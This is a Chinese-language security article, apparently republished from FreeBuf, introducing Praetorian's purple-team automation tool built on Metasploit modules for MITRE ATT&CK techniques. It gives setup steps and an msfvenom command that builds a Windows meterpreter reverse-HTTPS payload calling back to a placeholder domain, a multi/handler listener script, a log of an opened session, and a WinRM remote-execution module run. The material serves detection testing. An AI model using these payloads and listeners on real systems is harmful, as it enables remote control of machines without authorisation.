前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >PTAA:一款功能强大的紫队自动化渗透测试工具

PTAA:一款功能强大的紫队自动化渗透测试工具

作者头像
FB客服
发布2019-05-14 17:33:00
1.1K0
发布2019-05-14 17:33:00
举报
文章被收录于专栏:FreeBufFreeBuf

为了评估安全检测与事件响应能力,我们正在尝试寻找一种自动化模拟对手攻击策略的方式。通过研究,我们设计出了MITRE ATT&CK™ TTPs,并以Metasploit Framework的模块形式呈现-post模块。目前,我们已经可以自动化模拟出超过100 种TTPs了。

Metasploit的优势就在于其稳定健壮且丰富的功能库,该框架所带的模块能够与操作系统API直接交互,而且灵活易于扩展。除此之外,我们还可以利用Metasploit的execute_powershell模块来模拟出类似.NET内存中执行之类的功能。这将允许蓝队确保他们的工具在检测到特定TTP行为时能够有效发出警报,并不会执行特定代码或操作。(例如已编码的PowerShell)

我们的工具基于最新版本的Metasploit开发(2019年4月9日版:【Metasploit下载地址】)。在实现自动化机制的过程中,我们尽可能地减少了对Metasploit框架源码的修改量,以此来保证用户能够体验到接近原生的Metasploit。

工具安装

C2服务器-注册并搭建一台云虚拟机设备:【GCP传送门】。

DNS-选择一个域名并在DNS中注册,推荐使用CloudFlare:【CloudFlare传送门】。

SSL-我们建议大家使用有效的SSL证书来进行测试操作,推荐使用LetsEncrypt:

代码语言:javascript
复制
exportDNS_NAME="mytestdomain.com"wgethttps://dl.eff.org/certbot-autochmoda+x ./certbot-auto./certbot-auto-q./certbot-autocertonly -d $DNS_NAME --standalone --register-unsafely-without-email -n--agree-tos

Debian/Ubuntu

安装源:https://github.com/rapid7/metasploit-framework/tree/master/docker

安装docker:

代码语言:javascript
复制
curl-fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -apt-keyfingerprint 0EBFCD88add-apt-repository\   "deb [arch=amd64]https://download.docker.com/linux/debian jessie stable"apt-get-y updateapt-get-y install docker-ce

获取项目源码:

代码语言:javascript
复制
git clone git@github.com:praetorian-inc/purple-team-attack-automation.gitcd purple-team-attack-automation

修改LHOST以及对外端口:

代码语言:javascript
复制
echo"version: '3'services:  ms:    environment:    # example of setting LHOST      LHOST: 0.0.0.0    # example of adding more ports    ports:      - 8080:8080      - 443:443      - 80:80"> docker-compose.local.override.yml

设置COMPOSE_FILE环境变量,加载本地文件:

代码语言:javascript
复制
echo"COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml">> .env

构建容器:

代码语言:javascript
复制
docker -composebuild

运行容器:

代码语言:javascript
复制
./docker/bin/msfconsole

修改metasploit目录权限:

代码语言:javascript
复制
chmod-R ugo+rw ~/.msf4Payloadcd ~curlhttps://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall && \  chmod 755 msfinstall && \  ./msfinstallmsfvenom-p windows/x64/meterpreter_reverse_https lhost=mytestdomain.com lport=443 -ax64 -f exe HandlerSSLCert=~/purple-team-attack-automation/MSF.pemStagerVerifySSLCert=true -o ~/attack-testing.exe

监听器

你可以使用样本资源脚本来开启监听器:

代码语言:javascript
复制
$echo '<ruby>print_status("StartingHTTPS listener for Windows x64 meterpreter on port 443.")run_single("useexploit/multi/handler")run_single("setpayload windows/x64/meterpreter_reverse_https")run_single("setlport 443")run_single("setHandlerSSLCert MSF.pem")run_single("setExitOnSession false")run_single("setStagerVerifySSLCert true")run_single("exploit-j")</ruby>'> ~/purple-team-attack-automation/scripts/resource/windows_listener.rc

监听器开启后,payload将以管理员权限运行并发送回调信息。

使用模块

代码语言:javascript
复制
msf5auxiliary(scanner/smb/impacket/secretsdump) > resource windows_listener.rc[*]Processing /usr/src/metasploit-framework/scripts/resource/windows_listener.rcfor ERB directives.[*]resource (/usr/src/metasploit-framework/scripts/resource/windows_listener.rc)>Ruby Code (270 bytes)[*]Starting HTTPS listener for Windows x64 meterpreter on port 443.payload=> windows/x64/meterpreter_reverse_httpslport=> 443lhost=> 0.0.0.0[*]Exploit running as background job 0.[*]Exploit completed, but no session was created.msf5exploit(multi/handler) >[*]Started HTTPS reverse handler on https://0.0.0.0:443[*]https://0.0.0.0:443 handling request from 192.168.137.11; (UUID: czgdxj3z)Redirecting stageless connection from/2F-7ig9OfztlUGRSOeTJogLC1HD_4Yf2RGj-ZlWaPE6oCIdO_nvk_GC913H-gXl7lhXUXYcn withUA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'[*]https://0.0.0.0:443 handling request from 192.168.137.11; (UUID: czgdxj3z)Attaching orphaned/stageless session...[*]Meterpreter session 1 opened (172.18.0.3:443 -> 192.168.137.11:52012) at2019-04-15 16:10:27 +0000
msf5post(windows/purple/t1005) > use post/windows/purple/t1028msf5post(windows/purple/t1028) > info
       Name: Windows Remote Management (T1028)Windows - Purple Team     Module: post/windows/purple/t1028   Platform: Windows       Arch:       Rank: Normal
Providedby:  Praetorian
Compatiblesession types:  Meterpreter
Basicoptions:  Name    Current Setting                                                      Required  Description  ----    ---------------                                                      --------  -----------  CLEANUP true                                                                 yes       Close any instances ofcalc  CMD     winrm qc -q & winrm i c wmicimv2/Win32_Process@{CommandLine="calc"}  yes       Command to execute  SESSION 1                                                                    yes       The session to run thismodule on.
Description:  Execution, Lateral Movement: Windows RemoteManagement (WinRM) is  the name of both a Windows service and aprotocol that allows a user  to interact with a remote system (e.g., runan executable, modify  the Registry, modify services). It may becalled with the winrm  command or by any number of programs such asPowerShell.
References:  CVE: Not available  https://attack.mitre.org/wiki/Technique/T1028
msf5post(windows/purple/t1028) > exploit
[+]Found an instance of Calculator running. Killing it.[*]Executing 'cmd /c winrm qc -q & winrm i c wmicimv2/Win32_Process@{CommandLine="calc"}' on #<Session:meterpreter192.168.137.11:52012 (10.0.2.15) "PURPLEDEV\Administrator @DESKTOP-1">[!]WinRM service is already running on this machine.WSManFault    Message        ProviderFault            WSManFault                Message = WinRM firewall exceptionwill not work since one of the network connection types on this machine is setto Public. Change the network connection type to either Domain or Private andtry again.
Errornumber:  -2144108183 0x80338169WinRMfirewall exception will not work since one of the network connection types onthis machine is set to Public. Change the network connection type to eitherDomain or Private and try again.create_OUTPUT    ProcessId = 5456    ReturnValue = 0
[+]Module T1028W execution successful.[+]Found an instance of Calculator running. Killing it.[+]Found an instance of Calculator running. Killing it.[*]Post module execution completedmsf5post(windows/purple/t1028) >

* 参考来源:praetorian,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-05-02,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 工具安装
    • Debian/Ubuntu
    • 监听器
    • 使用模块
    相关产品与服务
    容器镜像服务
    容器镜像服务(Tencent Container Registry,TCR)为您提供安全独享、高性能的容器镜像托管分发服务。您可同时在全球多个地域创建独享实例,以实现容器镜像的就近拉取,降低拉取时间,节约带宽成本。TCR 提供细颗粒度的权限管理及访问控制,保障您的数据安全。
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档